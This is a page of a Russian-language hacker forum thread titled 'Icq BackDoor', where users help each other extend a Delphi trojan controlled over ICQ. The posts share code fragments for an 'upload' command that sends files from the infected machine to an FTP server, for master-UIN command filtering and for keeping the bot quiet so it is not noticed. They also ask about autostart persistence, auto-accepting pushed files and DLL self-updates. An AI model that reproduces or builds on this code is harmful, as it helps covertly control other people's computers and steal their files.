Форум   Статьи   Новости   Файлы   Bugtraq   Сниффер   Друзья   О Клубе
Вернуться   HPC / Кодинг / Другие Языки / Delphi
 
  Страница 2
  , 23:33   #16
Новичок
 
Регистрация: 02.12.2009
Сообщений: 25

Репутация: -1 / 0
По умолчанию Re: Icq BackDoor

Всё супер, надо продолжать, расширять возможности вашего произведения. если нужны идее, то влет подкинем ;о)
Да в целом не плохо, я тоже давно над этим бьюсь. Вот кто бы подсказал как реализовать:
использование dll для расширения функции в дальнейшем данного клиента, чтоб он сам периодически, а также и по команде проверял наличие обновления: с фтп обновление и скачивал, но перед тем сравнивал есть такое или нет и после скачивал; с емайла то тут скачивал и затем уточнял на наличие новой версии библиотеки, в случае то обновлял и перезапускал серверную часть, т.е. себя, хотя если он постоянно обращаться будет к dll при получении той или иной команды, для ее проверки наличия и определения дальнейшего действия в библиотеке, то и нет нужду перезапускать серверную часть.
 
Пользователь вне форума    
Наши Спонсоры
  , 16:39   #17
Постоянный
 
Аватар для cargo29
 
Регистрация: 26.10.2010
Сообщений: 611

Репутация: 5 / 0
По умолчанию Re: Icq BackDoor

Перезалейте??? сам клиент

Добавлено через 3 часа 23 минуты
code:
На форму кидаем IdFTP из Indy Clients;

var
f,t: string;

procedure TForm1.FormCreate(Sender: TObject);
IdFTP1.Host := '*хост*';
IdFTP1.Username := '*логин*';
IdFTP1.Password := '*пароль*';
IdFTP1.Connect;

procedure TForm1.ICQClient1MessageRecv(Sender: TObject; Msg, UIN: String);
if copy(msg,1,7)='upload ' then
begin
delete(msg,1,7);
//tmpStr:=StrNew(PAnsiChar(msg));
f := msg;
if IdFTP1.Connected then begin
IdFTP1.ChangeDir('/htdocs');
IdFTP1.Put(f, ExtractFileName(f));
end;
end;

как понять этот код первое ясно что подключается к ftp серверу а дальше? и как сделать наоборот что бы скачать с сервера файл в определеное место?
 

Последний раз редактировалось cargo29; 15.12.2010 в 20:03. Причина: Добавлено сообщение
Пользователь вне форума    
  , 13:42   #18
Форумчанин
 
Аватар для Sid994
 
Регистрация: 29.10.2010
Сообщений: 99

Репутация: 1 / 0
По умолчанию Re: Icq BackDoor

ТС перезалей сам клиент
__________________
Все когда то кончаеться...
Пользователь вне форума    
  , 17:55   #19
Новичок
 
Регистрация: 22.12.2010
Сообщений: 23

Репутация: 0 / 0
По умолчанию Re: Icq BackDoor

а как сделать так чтоб бот автоматически принимал мой файлы, которые я ему буду посылать , ну например в папку в виндовс или куда-то ещё ??
и такой вопрос, когда я прописываю бота в автозагрузку и перезагружаю пк у меня он выходит в онлайн(тестил у себя на 7 x64 ) а у других не выходит (7, ХР x32)
в процессах он есть, а вот в онлайн выйти не хочет ((
 
Пользователь вне форума    
  , 21:17   #20
Новичок
 
Регистрация: 18.12.2010
Сообщений: 17

Репутация: 0 / 0
По умолчанию Re: Icq BackDoor

Цитата:
Сообщение от cargo29 Посмотреть сообщение
IdFTP1.Username := '*логин*';
IdFTP1.Password := '*пароль*';
а где брать логин и пароль?
 
Пользователь вне форума    
  , 21:38   #21
Новичок
 
Регистрация: 22.12.2010
Сообщений: 23

Репутация: 0 / 0
По умолчанию Re: Icq BackDoor

martinrave

регистрировать
 
Пользователь вне форума    
  , 04:06   #22
Форумчанин
 
Регистрация: 16.12.2010
Сообщений: 33

Репутация: 0 / 0
По умолчанию Re: Icq BackDoor

Цитата:
Сообщение от Desar_Lite Посмотреть сообщение
а как сделать так чтоб бот автоматически принимал мой файлы, которые я ему буду посылать , ну например в папку в виндовс или куда-то ещё ??
и такой вопрос, когда я прописываю бота в автозагрузку и перезагружаю пк у меня он выходит в онлайн(тестил у себя на 7 x64 ) а у других не выходит (7, ХР x32)
в процессах он есть, а вот в онлайн выйти не хочет ((
Мб фаир блочит?

Добавлено через 11 минут
Цитата:
Сообщение от strange Посмотреть сообщение
а если программу распространить,ну и скажем юзера ее повключают, это что же значит, когда команду посылаешь, он отправляеться все юзерам, нежели, чем конкретному, так просто неудобно
Вот и недостаток этого бэкдора, как вариант заствить взаимодействвать с веб сервером где бы был размешен список уин пасс а на сервере скрипт который бы контролил какой уин отдан какому боту но эт помозговать надо.
code:
if copy(msg,1,4)='msg ' then
begin 
delete(msg,1,4); 
ShowMessage(msg);
end;
Тут есть проблемка если использовать этот код для отправки сообшений то все сообшения отправляймые боту будут вылазить а это как бы палево.
 

Последний раз редактировалось mironich; 24.12.2010 в 04:46. Причина: Добавлено сообщение
Пользователь вне форума    
  , 14:13   #23
Новичок
 
Регистрация: 22.12.2010
Сообщений: 23

Репутация: 0 / 0
По умолчанию Re: Icq BackDoor

mironich
нет неблочит, я непонимаю почему он не выходит,если второй раз запустить его, то он выйдет
 
Пользователь вне форума    
  , 12:31   #24
Новичок
 
Регистрация: 23.12.2009
Сообщений: 3

Репутация: 0 / 0
По умолчанию

Что прописать, чтобы он исполнял команды только от 1го номера icq который я укажу
 
Пользователь вне форума    
  , 18:24   #25
Местный
 
Аватар для Kzooz
 
Локация: Narnia
Регистрация: 12.02.2011
Сообщений: 271

Репутация: 6 / 0
По умолчанию

В обработчике события ICQClient1MessageRecv пишешь условие мол
code:
if uin := '123456789' then...
else...
Если номер такой-то, делаешь одно, если другой - ничего(например)
 
Пользователь вне форума    
  , 12:53   #26
Новичок
 
Регистрация: 23.12.2009
Сообщений: 3

Репутация: 0 / 0
По умолчанию

code:
  if uin<>strtoint(Form2.Edit3.Text) then
   begin
    IcqClient1.SendMessage(icq, '')
   end
  else
   begin
   ...  
   ...
   ... 
   end;
Попробовал сделать Master Uin, в выделенном месте вылает ошибку:
[Error] Unit1.pas(61): Incompatible types: 'String' and 'Integer'
но вроде как я правильно преобразовал...
Если записать так:
code:
if uin<>'123456789' then
  begin
    IcqClient1.SendMessage(icq, '')
   end
  else
   begin
   ...  
   ...
   ... 
   end;
то все работает
 
Пользователь вне форума    
  , 13:09   #27
Новичок
 
Регистрация: 23.12.2009
Сообщений: 3

Репутация: 0 / 0
По умолчанию

решил проблему так:
code:
var icq: cardinal;
begin
icq:=strtoint(UIN);
  if icq<>strtoint(Form2.edit3.text) then
   begin
   ...
   end
  else
   begin
   ...
   ...
   ...
   end;
end;
 
Пользователь вне форума    
  , 21:06   #28
Новичок
 
Регистрация: 02.12.2009
Сообщений: 25

Репутация: -1 / 0
По умолчанию

Плиз, подскажите сейчас уже не реально реализовать на прямую передачу файла с клиента до клиента?
 
Пользователь вне форума    

Метки
backdoor, icq, вирус, троян

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Статья] Угон ICQ номера по примари базе Kvatra Icq 22 24.12.2011 01:05
Исчезли данные с Диска D i E и не Много с Рабочего стола (Russia) За чашечкой чая 23 11.05.2011 19:21
[Обзор] полезний софт для ICQ ivslavik Софт для Windows 3 28.10.2010 14:06
Роздача ICQ ( 9 і 8 знаки) від Profesor007 Profesor007 Раздачи 8 13.08.2010 11:25



Часовой пояс GMT +2
Powered by vBulletin® 3.x.x Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

Copyright © 2008 - 2013 «HPC» Реклама на сайте Правила Форума Пользовательское соглашение Работа на сайте
При копировании материалов ставьте ссылку на источник
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.